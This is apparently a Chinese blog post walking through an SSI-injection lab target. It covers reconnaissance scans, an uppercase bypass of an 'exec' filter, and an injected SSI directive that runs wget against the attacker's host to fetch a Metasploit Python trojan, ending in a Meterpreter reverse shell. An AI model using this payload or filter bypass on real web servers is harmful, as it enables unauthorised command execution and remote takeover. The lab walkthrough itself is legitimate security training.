ssi注入详解
ssi是賦予html靜態頁面的動態效果,通過ssi執行命令,返回對應的結果,若在網站目錄中發現了.stm .shtm .shtml等,且對應SSL輸入沒有過濾,可能存在SSI注入漏洞
簡單的說ssi注入就是尋找輸入點輸入類似<!--#exec cmd="命令" --> 格式,看看能不能運行系統命令
首先netdiscover -r 你的ip/24掃描得到靶場IP
用nmap進行掃描
用dirb進行掃描
發現了ssi,意識到可能是ssi注入
訪問一下http://192.168.199.164/ssi
訪問一下http://192.168.199.164/index,這是已經可以基本確定是ssi注入了
訪問一下robots,發現了一個敏感目錄
訪問這個敏感目錄
發現兩個備份文件,打開看看,在第二個文件發現了當前目錄,錯誤日志和登錄日志的位置
訪問一下這個網站,把訪問index的內容輸上去看看
發現過濾的exec
用大寫可以
但是返回的好像不大對,然后我去查了一下,發現少了一個!
加上感嘆號,用大寫再試一次,成功了
用msf做一個木馬,這里選擇的是py,也可以用php等
移動到Apache2的根目錄下
檢查一下Apache2服務是否開啟
利用ssi注入下載這個木馬
<!--#EXEC cmd="wget http://192.168.199.161/shell.py"-->第一個框里其實填什么都可以,跟sql注入一樣
提升權限
打開msf
設置監聽
運行木馬
成功連接
sysinfo查看信息
輸入shell進行控制,輸入python -c "import pty;pty.spawn('/bin/bash')"進行美化
接下來cd /root切換到root目錄,一般情況flag就在這里,因為我當時漏掉了提權那步,所以權限不夠,又懶得在重新弄了…
總結
- 上一篇: Win系统 - 内存稳定性测试软件(Me
- 下一篇: 合并支付宝和微信的收钱码